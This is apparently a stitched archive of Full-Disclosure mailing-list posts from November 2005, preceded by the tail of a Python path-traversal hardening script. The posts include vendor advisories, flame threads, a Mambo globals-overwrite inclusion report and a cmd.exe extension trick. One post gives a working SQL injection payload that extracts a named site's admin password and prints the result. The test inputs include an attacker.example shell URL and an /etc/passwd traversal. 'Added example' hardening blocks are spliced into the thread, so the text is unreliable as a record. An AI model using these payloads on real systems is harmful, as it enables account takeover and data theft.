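    """Raise ValueError instead of returning a reason; the form to use at the include site."""
    ok, result = check_page_name(page_root, requested)
    if not ok:
        raise ValueError(result)
    return result


if __name__ == "__main__":
    # Constructed samples of what a legitimate user and an attacker would send.
    for name in ("welcome.html", "sub/../welcome.html", "../../../etc/passwd",
                 "/etc/passwd", "http://attacker.example/shell.txt", "php://input"):
        print(f"{name!r:38} flawed   -> {vulnerable_resolve(PAGE_ROOT, name)}")
        print(f"{'':38} hardened -> {check_page_name(PAGE_ROOT, name)}")
```

The order of the checks matters: the NUL and scheme tests run before any
filesystem call so that a stream wrapper such as php:// or data: is never
handed to the resolver, and the commonpath comparison is done on realpath()
output so a symlink planted inside the page directory cannot point back out.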

Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread Dave King
While it still may not be "millions of people" several products come
bundled with the desktop edition of SQL Server 2000, and I'm sure many
will come with SQL Server 2005 Express.  As far as I can tell by reading
the paper (but not testing it myself) these are probably vulnerable as
well if the configuration allows the guest account access to the database.

Dave King
http://www.thesecure.net

>
> To be honest I don't think we're talking millions of people. How many
> people at home run a fully fledged RDBMS on their XP systems? Very few
> I'd guess. Besides, Simple File Sharing is documented so MS are
> educating those willing to seek information.
>



Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread Eliah Kagan
James Tucker wrote:
> Long day?

It will be.

-Eliah


Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

2005-11-16 Thread Byron Sonne

> Please don't ever think to put the discussion on the level of personal
> attacks.

It's not an attack; it's karma. Also a way of looking after the community.

> No one is interested, and it's only in the interests of that

I beg to differ.


RE: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread James Tucker
Long day?

> -Original Message-
> From: Eliah Kagan [mailto:[EMAIL PROTECTED]
> Sent: 16 November 2005 18:45
> To: [EMAIL PROTECTED]
> Cc: bugtraq@securityfocus.com;
> full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] Database servers on XP and the
> curious flaw
>
> James Tucker wrote (off-list):
> > I think you mis-read the paper, this is NOT the fault of MS, whose
> > DBS is NOT vulnerable due to PROPER authentication design
> with the host OS.
>
> Yeah, you're right. What am I saying...?
>
> Forget everything I just said in this thread...
>
> I apologize to everybody who read what I said before.
>
> -Eliah




Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread Eliah Kagan
James Tucker wrote (off-list):
> I think you mis-read the paper, this is NOT the fault of MS, whose DBS is 
> NOT vulnerable due to PROPER authentication
> design with the host OS.

Yeah, you're right. What am I saying...?

Forget everything I just said in this thread...

I apologize to everybody who read what I said before.

-Eliah


Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread Eliah Kagan
David Litchfield wrote:
> Hi Eliah,
>
> >David Litchfield wrote:
> >> Hey all,
> >> I've just put up a paper on a curious flaw that appears when running a
>
> >My intent is not to MS-bash here, but perhaps Microsoft is to blame
> >for not educating people about this issue. (If they had, your paper
> >would be superfluous.)
>
> >Usually if millions of users are insecure because they don't know
> >something, someone is to blame.
>
> To be honest I don't think we're talking millions of people. How many people
> at home run a fully fledged RDBMS on their XP systems? Very few I'd guess.
> Besides, Simple File Sharing is documented so MS are educating those willing
> to seek information.
>
> Cheers,
> David
> http://www.databasesecurity.com/
> http://www.ngssoftware.com/

If I use an insecurely configured database for anything critical, I am
insecure. That's everybody at a company that runs such a server and
has it configured insecurely, every customer of the company who has
personal information stored in the server, etc. I think that amounts
to millions.

However, it is true that by saying that, I made the problem look more
widespread than it actually is, which is bad because it dilutes the
power of the term, "millions of users," so that when the next UPnP or
DCOM comes around, it will be more difficult to raise awareness about
it. For this, I apologize.

What I should say is, "usually, if millions of people are at risk of
having their information security compromised because a few people
don't know something they should, someone is to blame."

The fault is certainly distributed, and it's not all on MS's
shoulders. Come to think of it, if I (putting myself in the shoes of a
clueless network administrator) am running a database server with
simple file sharing enabled and not thinking about security, the fault
is probably mine.

But whoever's fault it is, I hope your paper moves people who don't
have their act together, to get it together.

-Eliah


re: [Full-disclosure] freeftpd USER bufferoverflow

2005-11-16 Thread KF (lists)
The default configuration is not vulnerable unless the Logging option 
"Log events" is checked.


-KF



Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread David Litchfield

Hi Eliah,

> David Litchfield wrote:
> > Hey all,
> > I've just put up a paper on a curious flaw that appears when running a
>
> My intent is not to MS-bash here, but perhaps Microsoft is to blame
> for not educating people about this issue. (If they had, your paper
> would be superfluous.)
>
> Usually if millions of users are insecure because they don't know
> something, someone is to blame.

To be honest I don't think we're talking millions of people. How many people
at home run a fully fledged RDBMS on their XP systems? Very few I'd guess.
Besides, Simple File Sharing is documented so MS are educating those willing
to seek information.

Cheers,
David
http://www.databasesecurity.com/
http://www.ngssoftware.com/




Re: [Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread Eliah Kagan
David Litchfield wrote:
> Hey all,
> I've just put up a paper on a curious flaw that appears when running a
> database server on Windows XP with Simple File Sharing enabled. The flaw
> essentially allows a remote attacker to gain access to the database,
> sometimes with DBA privileges, without knowledge of a valid password. To be
> honest, no-one is really to blame; it's just one of those cases where you
> take two disparate mechanisms, shake them up, add a dash of lime and serve
> up. The paper can be found here
> http://www.databasesecurity.com/dbsec-papers.htm and is entitled "Database
> Servers on Windows XP and the Unintended Consequences of Simple File
> Sharing". It doubles-up as my entry for the "Longest Title" award.
> Cheers,
> David Litchfield
> http://www.databasesecurity.com/
> http://www.ngssoftware.com/

My intent is not to MS-bash here, but perhaps Microsoft is to blame
for not educating people about this issue. (If they had, your paper
would be superfluous.)

Usually if millions of users are insecure because they don't know
something, someone is to blame.

-Eliah


[Full-disclosure] CMP Media Acquires Black Hat

2005-11-16 Thread Davide Del Vecchio
http://www.prnewswire.com/cgi-bin/stories.pl?ACCT=104&STORY=/www/story/11-15-2005/0004216861&EDATE=


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Davide Del Vecchio "Dante Alighieri" [EMAIL PROTECTED] [EMAIL PROTECTED]
http://www.alighieri.org http://www.ezln.it
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 




Re: [Full-disclosure] Was: n3td3v.com, SHUT THE FUCK UP!

2005-11-16 Thread n3td3v n3td3v
Trolling is a two-way street.
There is the troll and people that can't help but get a word in.
All of these threads would have gone away long ago if everyone just ignored it.
By the way, social engineering is a big part of security.

On 11/16/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> Damn shut the fuck up all bunch of kiddies
> searching friends and leave FD for what it is , SECURITY!
>
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On behalf of poo
> Sent: Wednesday, 16 November 2005 10:05
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel
>
> throw the filthy wench
> off the starboard bow yaaar
>
> On 11/16/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
> > On 11/15/05, Byron Sonne <[EMAIL PROTECTED]> wrote:
> > >  > Carolyn Meinel wrote:
> > >
> > > I'd be wary of anything Ms. Meinel has to say:
> > > http://attrition.org/errata/charlatan/shame/index2.html
> > >
> > > The info's old but some leopards don't change their spots.
> >
> > and some never deserved their spots in the first place...
>
> --
> smile tomorrow will be worse


Re: [Full-disclosure] Kiddiots Today

2005-11-16 Thread n3td3v n3td3v
That's right, I am the ass that keeps prodding to continue posting.
The point being you just keep provoking more by not letting it go.

On 11/15/05, Aditya Deshmukh <[EMAIL PROTECTED]> wrote:
> and you replied to it again.
>
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of n3td3v n3td3v
> Sent: Tuesday, November 15, 2005 10:27 PM
> To: J. Oquendo
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Kiddiots Today
>
> And yet you took the time to add to it.
>
> On 11/15/05, J. Oquendo <[EMAIL PROTECTED]> wrote:
> > On Tue, 15 Nov 2005, n3td3v n3td3v wrote:
> > > Or am I the real n3td3v just throwing up smokescreens, who knows?
> >
> > No one cares much for this moronic thread nor whether or not someone is
> > throwing up smokescreens. Can some of you guys grow up or at least grow a
> > clue and speak about something worthwhile. This list has the tendency to
> > bring brainrot.
> >
> > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
> > J. Oquendo
> > GPG Key ID 0x97B43D89
> > http://mo.fscker.com :: Obscurity through Insecurity
> >
> > "I know what I have given you. I do not know what
> > you have received" -- Antonio Porchia


[Full-disclosure] Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920 Wireless IP Phone

2005-11-16 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Fixed SNMP Communities and Open UDP Port in Cisco 7920
Wireless IP Phone

Document ID: 68179

Advisory ID: cisco-sa-20051116-7920

http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml

Revision 1.0

For Public Release 2005 November 16 1600 UTC (GMT)

- ---

Contents


Summary
Affected Products
Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of This Notice: FINAL
Distribution
Revision History
Cisco Security Procedures

- ---

Summary
=======

The Cisco 7920 Wireless IP Phone provides Voice Over IP service via IEEE
802.11b Wi-Fi networks and has a form-factor similar to a cordless phone. This
product contains two vulnerabilities:

The first vulnerability is an SNMP service with fixed community strings that
allow remote users to read, write, and erase the configuration of an affected
device.

The second vulnerability is an open VxWorks Remote Debugger on UDP port 17185
that may allow an unauthenticated remote user to access debugging information
or cause a denial of service.

Cisco has made free software available to address these vulnerabilities for
affected customers. There are workarounds available to mitigate the effects of
the vulnerability.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20051116-7920.shtml.

Affected Products
=================

Vulnerable Products
+------------------

  * Cisco 7920 Wireless IP Phone, firmware version 2.0 and earlier

Products Confirmed Not Vulnerable
+--------------------------------

  * Cisco 7920 Wireless IP Phone, firmware version 2.01

No other Cisco products are currently known to be affected by these
vulnerabilities, including other IP telephony products.

Details
=======

Fixed SNMP Community Strings
+---------------------------

The Cisco 7920 Wireless IP Phone provides an SNMP service with fixed read-only
and read-write community strings of "public" and "private", respectively. These
strings cannot be changed by the user and will allow remote users to issue an
SNMP GetRequest or SetRequest to the phone. SNMP can be used to retrieve and
modify the device configuration, including stored user data such as phone book
entries. To address this vulnerability, Cisco has provided updated software
that removes the SNMP functionality from this product.

This issue is documented in Cisco bug ID CSCsb75186 (registered customers
only).

VxWorks Debugger Port (wdbrpc, 17185/udp)
+----------------------------------------

The Cisco 7920 Wireless IP Phone listens on UDP port 17185 to allow connections
from a VxWorks debugger. This port may allow remote users to collect debugging
information or conduct a denial of service attack against an affected device.
To address this vulnerability, Cisco has provided updated software that closes
UDP port 17185.

This issue is documented in Cisco bug ID CSCsb38210 (registered customers
only).

Impact
======

Successful exploitation of these vulnerabilities may result in information
leakage or denial of service attacks against an affected device. In the case of
the Fixed SNMP Community Strings vulnerability, an attack may take the form of
erasure or modification of the device configuration and personal user data.

Software Versions and Fixes
===========================

Cisco has provided free software to address these vulnerabilities; please
consult the chart below for details.

When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a complete upgrade
solution.

In all cases, customers should exercise caution to be certain the devices to be
upgraded contain sufficient memory and that current hardware and software
configurations will continue to be supported properly by the new release. If
the information is not clear, contact the Cisco Technical Assistance Center
("TAC") or your contracted maintenance provider for assistance.

+-+
|| Affected  |   First|
|Cisco Bug ID| Firmware  |   Fixed|
|| Releases  |  Firmware  |
||   |  Release   |
|+---+|
| CSCsb75186 (   | Release   ||
| registered | 1.0(8)| Release|
| customers only)| and   | 1.0(9) |
| (SNMP) | earlier   ||
|+---+|
| CSCsb38210 (   | Release   ||
| registered | 2.0 and   | Release|
| customers only)| earli

[Full-disclosure] mambo remote code execution

2005-11-16 Thread peter MC tachatte
A vulnerability exists in globals.php when register_globals is off and allows remote code inclusion.

This is a GLOBALS overwrite.

In components/com_content/content.html.php there is the line:

require_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/HTML_toolbar.php' );

OK, the globals.php:

if (!ini_get('register_globals')) {
    while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
    while(list($key,$value)=@each($_SESSION)) $GLOBALS[$key]=$value;
    foreach($_FILES as $key => $value){
        $GLOBALS[$key]=$_FILES[$key]['tmp_name'];
        foreach($value as $ext => $value2){
            $key2 = $key . '_' . $ext;
            $GLOBALS[$key2] = $value2;
        }
    }
}

The fake protection in mambo.php:

if (in_array( 'globals', array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) {
    die( 'Fatal error. Global variable hack attempted.' );
}
if (in_array( '_post', array_keys( array_change_key_case( $_REQUEST, CASE_LOWER ) ) ) ) {
    die( 'Fatal error. Post variable hack attempted.' );
}
 
poc: http://enviede.wistee-heb.fr/index.php?cat=poc
 
[EMAIL PROTECTED]
 
 
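As an added example (not Mambo's own code, and not part of the post above), here is the same register_globals emulation written so that a request cannot overwrite $GLOBALS or a configuration value the application already defined. Every source goes through one filter, including $_FILES: the mambo.php check only inspects $_REQUEST, which merges GET, POST and COOKIE data, so a key arriving through a file upload never reaches it. The mosConfig_absolute_path placeholder value, the sample request arrays and the function names are constructed for the demonstration; the import is written into a local array rather than the real $GLOBALS so the script runs without side effects (PHP 7.1 or later is assumed for the type declarations).

```php
<?php
// Added example, not Mambo's code: a register_globals emulation that refuses
// to import any request key able to clobber a PHP superglobal or a value the
// application already defined. The mosConfig_absolute_path value and the
// sample request arrays below are constructed for the demonstration; the
// import goes into a local array instead of the real $GLOBALS.

// Superglobal names, compared case-insensitively, that must never be imported.
const PROTECTED_NAMES = [
    'globals', '_get', '_post', '_cookie', '_files',
    '_env', '_server', '_session', '_request',
];

/**
 * Keep only the keys of $source that are safe to copy into the global scope:
 * not a superglobal name, not already defined (configuration wins over the
 * request), and a syntactically valid variable name. Rejected keys are
 * appended to $rejected so the caller can log them.
 */
function filter_import(array $source, array $existing, array &$rejected): array
{
    $safe = [];
    foreach ($source as $key => $value) {
        $key = (string) $key;
        if (in_array(strtolower($key), PROTECTED_NAMES, true)
            || array_key_exists($key, $existing)
            || !preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
            $rejected[] = $key;
            continue;
        }
        $safe[$key] = $value;
    }
    return $safe;
}

/**
 * Apply the same filter to every request source. $_FILES is included on
 * purpose: a check that only looks at $_REQUEST (GET, POST, COOKIE) never
 * sees a key that arrives as a file upload.
 */
function import_request_vars(array $sources, array &$globals, array &$rejected): void
{
    foreach ($sources as $source) {
        foreach (filter_import($source, $globals, $rejected) as $key => $value) {
            $globals[$key] = $value;
        }
    }
}

// Constructed scenario: configuration already loaded, then a request that
// carries a configuration name and the GLOBALS name through several sources.
$globals = ['mosConfig_absolute_path' => '/srv/www/mambo'];   // placeholder path
$sources = [
    'GET'   => ['id' => '12', 'mosConfig_absolute_path' => 'http://untrusted.example/'],
    'POST'  => ['GLOBALS' => ['x' => 'y']],
    'FILES' => ['GLOBALS' => ['name' => 'a.txt', 'tmp_name' => '/tmp/php-upload']],
];
$rejected = [];
import_request_vars($sources, $globals, $rejected);

// The configured path is kept, 'id' is imported, and the three hostile keys
// (one per source) end up in $rejected.
print_r($globals);
print_r($rejected);
```

The filter is deliberately applied to $_FILES with the same rules as the other sources; the safer option for a new code base is not to emulate register_globals at all and read request data explicitly where it is needed.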

[Full-disclosure] [ GLSA 200511-14 ] GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities

2005-11-16 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200511-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: GTK+ 2, GdkPixbuf: Multiple XPM decoding vulnerabilities
  Date: November 16, 2005
  Bugs: #112608
ID: 200511-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The GdkPixbuf library, that is also included in GTK+ 2, contains
vulnerabilities that could lead to a Denial of Service or the
execution of arbitrary code.

Background
==========

GTK+ (the GIMP Toolkit) is a toolkit for creating graphical user
interfaces. The GdkPixbuf library provides facilities for image
handling. It is available as a standalone library and also packaged
with GTK+ 2.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  x11-libs/gtk+                < 2.8.6-r1                 >= 2.8.6-r1
                                                           *>= 2.6.10-r1
                                                                  < 2.0
  2  media-libs/gdk-pixbuf       < 0.22.0-r5                >= 0.22.0-r5
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

iDEFENSE reported a possible heap overflow in the XPM loader
(CVE-2005-3186). Upon further inspection, Ludwig Nussel discovered two
additional issues in the XPM processing functions : an integer overflow
(CVE-2005-2976) that affects only gdk-pixbuf, and an infinite loop
(CVE-2005-2975).

Impact
======

Using a specially crafted XPM image an attacker could cause an affected
application to enter an infinite loop or trigger the overflows,
potentially allowing the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GTK+ 2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose x11-libs/gtk+

All GdkPixbuf users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/gdk-pixbuf-0.22.0-r5"

References
==========

  [ 1 ] CVE-2005-2975
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2975
  [ 2 ] CVE-2005-2976
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2976
  [ 3 ] CVE-2005-3186
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3186
  [ 4 ] iDefense Security Advisory 11.15.05

http://www.idefense.com/application/poi/display?id=339&type=vulnerabilities

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0




[Full-disclosure] Database servers on XP and the curious flaw

2005-11-16 Thread David Litchfield
Hey all,
I've just put up a paper on a curious flaw that appears when running a
database server on Windows XP with Simple File Sharing enabled. The flaw
essentially allows a remote attacker to gain access to the database,
sometimes with DBA privileges, without knowledge of a valid password. To be
honest, no-one is really to blame; it's just one of those cases where you
take two disparate mechanisms, shake them up, add a dash of lime and serve
up. The paper can be found here
http://www.databasesecurity.com/dbsec-papers.htm and is entitled "Database
Servers on Windows XP and the Unintended Consequences of Simple File
Sharing". It doubles-up as my entry for the "Longest Title" award.
Cheers,
David Litchfield
http://www.databasesecurity.com/
http://www.ngssoftware.com/




Re: [Full-disclosure] Three years and ten months without a patch

2005-11-16 Thread Marco Ermini
On 11/16/05, Barrie Dempster <[EMAIL PROTECTED]> wrote:
[...]
> Are we forgetting slammer ? A worm that attacked a product which you
> would expect to be used in a similar way.
>
> Backend or not, the system should be patched, being backend is not a
> justifiable reason for not patching the system.
[...]
> Believing this would be a very narrow view of security and we
> all know security is far from something to be viewed like that.
[...]

You are totally right. In fact I was (or better - I *tried* to be...)
ironical about it... that's their philosophy: on 8.1.x you are 4
versions behind their actual off-the-shelf product - which, as we
said, "never breaks" so, of course, why not upgrade?... (and pay the
licensing fees)


Cheers
--
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
(This message is for the designated recipient only and may contain
privileged or confidential information. If you have received it in
error, please notify the sender immediately and delete the original.)


Re: [Full-disclosure] Three years and ten months without a patch

2005-11-16 Thread Barrie Dempster
On Wed, 2005-11-16 at 10:19 +0100, Marco Ermini wrote:
> On 11/15/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
> > So why not start teaching some lessons David and release exploit code.
> >  It seems that is the only way they learn and take thing seriously.
> 
> Rarely this software did not run in a what is considered "secured"
> environment - I mean, this is rarely exposed on Internet/DMZs. Usually
> Oracle DB (especially these older versions which didn't have so much
> web application software) are used just as database back end, which
> communicates with DMZs through multiple firewall levels (I am not
> justifying them in any way, I am just guessing why they may not care
> so much). Security is considered often not important - especially if
> you can "inexpensively" upgrade to a 9.x or 10.x or 11.x software
> version which "never breaks"...

Are we forgetting Slammer? A worm that attacked a product which you
would expect to be used in a similar way.

Backend or not, the system should be patched; being backend is not a
justifiable reason for not patching the system. Ignoring the fact that
these systems are commonly open to the net, you also ignore injection of
commands from a front end web server being carried backwards, and what
about the local user?

I work in a few environments where a DBA should not be allowed access to
the OS at any point other than to query the DB. A vulnerability such as
this in the software in use would have serious consequences in that
situation. Believing this would be a very narrow view of security and we
all know security is far from something to be viewed like that.

-- 
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

"He who hingeth aboot, geteth hee-haw" Victor - Still Game

blog:  http://reboot-robot.net
sites: http://www.bsrf.org.uk - http://www.security-forums.com
ca:https://www.cacert.org/index.php?id=3



[Full-disclosure] 30gigs SQL injection vulnerability

2005-11-16 Thread cumhur onat
I found an SQL injection vulnerability, which leads to password disclosure, in the 30gigs.com email service.
The vulnerability exists in the http://www.30gigs.com/getpassword/ page due to lack of validation of user submitted data.
Proof of Concept:
enter http://www.30gigs.com/getpassword/
and copy & paste this code in the Login field, finally submit the form.

not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin

It will give an output like below, in which "runsit" corresponds to the password of the account "admin":
We have sent the password for your not_existant' union select
1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
userLogin='[EMAIL PROTECTED] account to runsit

The site was notified about the vulnerability 2 weeks ago, but no response was received.

Re: [Full-disclosure] another filename bypass vulnerability - from cmd.exe

2005-11-16 Thread 6ackpace
It also works for windowsXp 2 and with other extensions.

i.e. exe.txt.exe.pdf ...

On 11/16/05, Aditya Deshmukh <[EMAIL PROTECTED]> wrote:
> Was doing some testing [xfocus-AD-051115]
> Ie Multiple antivirus failed to scan malicious filename bypass vulnerability
>
> The system is windows 2000 sp4 srp5 with all other patches upto date.
>
> At the command prompt cmd.exe execute the following with the results.
> I copy and paste from cmd.exe
> ---
> E:\TEMP>cd test
>
> E:\TEMP\test>copy %windir%\system32\calc.exe
>    1 file(s) copied.
>
> E:\TEMP\test>ren calc.exe calc.exe.zip
>
> E:\TEMP\test>dir /b
> calc.exe.zip
>
> E:\TEMP\test>calc.exe.zip
>
> E:\TEMP\test>
> ---
> This brings up the calc.exe on the screen.


[Full-disclosure] another filename bypass vulnerability - from cmd.exe

2005-11-16 Thread Aditya Deshmukh
Was doing some testing [xfocus-AD-051115]
Ie Multiple antivirus failed to scan malicious filename bypass vulnerability

The system is windows 2000 sp4 srp5 with all other patches upto date.

At the command prompt cmd.exe execute the following with the results.

I copy and paste from cmd.exe
---

E:\TEMP>cd test

E:\TEMP\test>copy %windir%\system32\calc.exe
1 file(s) copied.

E:\TEMP\test>ren calc.exe calc.exe.zip

E:\TEMP\test>dir /b
calc.exe.zip 

E:\TEMP\test>calc.exe.zip

E:\TEMP\test>
---
This brings up the calc.exe on the screen.

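The rename above works because the loader looks at the file's content, not its name, so any scanner or upload filter that decides by extension is looking at the wrong thing. As an added example (not part of the post, and not code from any of the products named in the thread), here is a check that classifies a file as a Windows executable from its MZ/PE signature regardless of extension. The sample files are constructed minimal headers written to the temp directory, not real programs; the function names are the example's own.

```php
<?php
// Added example, not from the post: decide "is this a PE executable?" from
// the file's bytes instead of its name. The sample files below are
// constructed minimal headers, not real programs.

/**
 * True if $path starts with an IMAGE_DOS_HEADER ("MZ") whose e_lfanew field
 * (offset 60, little-endian 32-bit) points at the "PE\0\0" signature.
 */
function looks_like_pe(string $path): bool
{
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return false;
    }
    try {
        $dos = fread($fh, 64);                      // IMAGE_DOS_HEADER is 64 bytes
        if ($dos === false || strlen($dos) < 64 || substr($dos, 0, 2) !== 'MZ') {
            return false;
        }
        $lfanew = unpack('Voff', substr($dos, 60, 4))['off'];
        if ($lfanew < 64 || fseek($fh, $lfanew) !== 0) {
            return false;                           // header points nowhere sane
        }
        return fread($fh, 4) === "PE\0\0";          // short read simply fails the test
    } finally {
        fclose($fh);
    }
}

/** Constructed 88-byte stand-in for an executable: MZ header, e_lfanew = 64, PE signature. */
function make_sample_pe(): string
{
    $dos = 'MZ' . str_repeat("\0", 58) . pack('V', 64);
    return $dos . "PE\0\0" . str_repeat("\0", 20);
}

/** Classify each sample; returns name => bool so the result can be inspected. */
function classify_samples(array $samples): array
{
    $result = [];
    foreach ($samples as $name => $bytes) {
        $path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $name;
        file_put_contents($path, $bytes);
        $result[$name] = looks_like_pe($path);
        unlink($path);
    }
    return $result;
}

// The same constructed executable under its own name and under the renamed
// form from the post, plus a text file that must not match.
$verdicts = classify_samples([
    'sample.exe'     => make_sample_pe(),
    'sample.exe.zip' => make_sample_pe(),
    'notes.txt'      => "just text\n",
]);
foreach ($verdicts as $name => $isPe) {
    printf("%-16s PE=%s\n", $name, $isPe ? 'yes' : 'no');
}
```

Both sample.exe and sample.exe.zip are reported as PE and notes.txt is not, which is the property an upload filter or scanner needs: the extension is a label, the signature is evidence.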


[Full-disclosure] [USN-216-1] GDK vulnerabilities

2005-11-16 Thread Martin Pitt
===
Ubuntu Security Notice USN-216-1  November 16, 2005
gtk+2.0, gdk-pixbuf vulnerabilities
CVE-2005-2975, CVE-2005-2976, CVE-2005-3186
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

gtk2-engines-pixbuf
libgdk-pixbuf2

The problem can be corrected by upgrading the affected package to
the following versions:

Ubuntu 4.10:
  libgdk-pixbuf2: 0.22.0-7ubuntu1.2
  gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1

Ubuntu 5.04:
  libgdk-pixbuf2: 0.22.0-7ubuntu2.1
  gtk2-engines-pixbuf: 2.6.4-0ubuntu3.1

Ubuntu 5.10:
  libgdk-pixbuf2: 0.22.0-8ubuntu0.1
  gtk2-engines-pixbuf: 2.8.6-0ubuntu2.1

After a standard system upgrade you should restart your session to
effect the necessary changes.

Details follow:

Two integer overflows have been discovered in the XPM image loader of
the GDK pixbuf library. By tricking a user into opening a specially
crafted XPM image with any Gnome desktop application that uses this
library, this could be exploited to execute arbitrary code with the
privileges of the user running the application.
(CVE-2005-2976, CVE-2005-3186)

Additionally, specially crafted XPM images could cause an endless loop
in the image loader, which could be exploited to cause applications
trying to open that image to hang. (CVE-2005-2975)


Updated packages for Ubuntu 4.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-7ubuntu1.2.diff.gz
  Size/MD5:   375968 809e328e7978a1a05c363744b669a40e

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0-7ubuntu1.2.dsc
  Size/MD5:  723 6c4495f57699b76148a0602927545e20

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/gdk-pixbuf_0.22.0.orig.tar.gz
  Size/MD5:   519266 4db0503b5a62533db68b03908b981751

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10-1ubuntu1.2.diff.gz
  Size/MD5:49509 0ce4ae3ba4a43acaec0e267593c56400

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10-1ubuntu1.2.dsc
  Size/MD5: 1936 dde6d8e7ba7c47e843a5dc8c2b680499

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/gtk+2.0_2.4.10.orig.tar.gz
  Size/MD5: 14140860 b1876ebde3b85bceb576ee5e2ecfd60b

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-common_2.4.10-1ubuntu1.2_all.deb
  Size/MD5:  2778618 00f15aa5dba52503adaf47cede461b2c

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-doc_2.4.10-1ubuntu1.2_all.deb
  Size/MD5:  1877958 bd501df1b60309f472ad33ee74200584

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/universe/g/gtk+2.0/gtk2.0-examples_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:   262178 27831fe024d2d09ac5f3c9c457ae0032

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-7ubuntu1.2_amd64.deb
